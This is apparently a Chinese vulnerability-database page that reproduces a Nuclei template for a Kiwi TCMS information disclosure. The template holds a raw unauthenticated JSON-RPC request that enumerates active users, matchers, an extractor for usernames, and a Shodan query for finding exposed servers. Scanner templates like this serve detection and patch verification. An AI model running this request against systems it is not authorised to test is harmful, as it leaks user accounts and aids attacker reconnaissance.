kiwitcms-json-rpc: Kiwi TCMS Information Disclosure

日期: 2025-08-01 | 影响软件: kiwitcms | POC: 已公开

漏洞描述

Internal info exposed in Kiwi TCMS.

PoC代码[已公开]

id: kiwitcms-json-rpc

info:
  name: Kiwi TCMS Information Disclosure
  author: act1on3
  severity: high
  description: Internal info exposed in Kiwi TCMS.
  reference:
    - https://hackerone.com/reports/968402
    - https://kiwitcms.org/blog/kiwi-tcms-team/2020/08/23/kiwi-tcms-86/
    - https://github.com/act1on3/nuclei-templates/blob/master/vulnerabilities/kiwi-information-disclosure.yaml
  classification:
    cpe: cpe:2.3:a:kiwitcms:kiwi_tcms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: kiwitcms
    product: kiwi_tcms
    shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337
  tags: kiwitcms,exposure,misconfig,hackerone,vuln

http:
  - raw:
      - |
        POST /json-rpc/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept-Encoding: gzip, deflate

        {"jsonrpc":"2.0","method":"User.filter","id": 1,"params":{"query":{"is_active":true}}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - result
          - username
          - jsonrpc
          - is_active
        condition: and

    extractors:
      - type: json
        part: body
        json:
          - .result[].username
# digest: 4a0a00473045022100851e8b2e78970f193fb9a56a10f55a317884fd924c302ffd86151cc55b00020402205833c2c23a8dbfc813744392ece07a190ccf87b220e67419e6e1149ab0c420d3:922c64590222798bb761d5b6d8e72950

相关漏洞推荐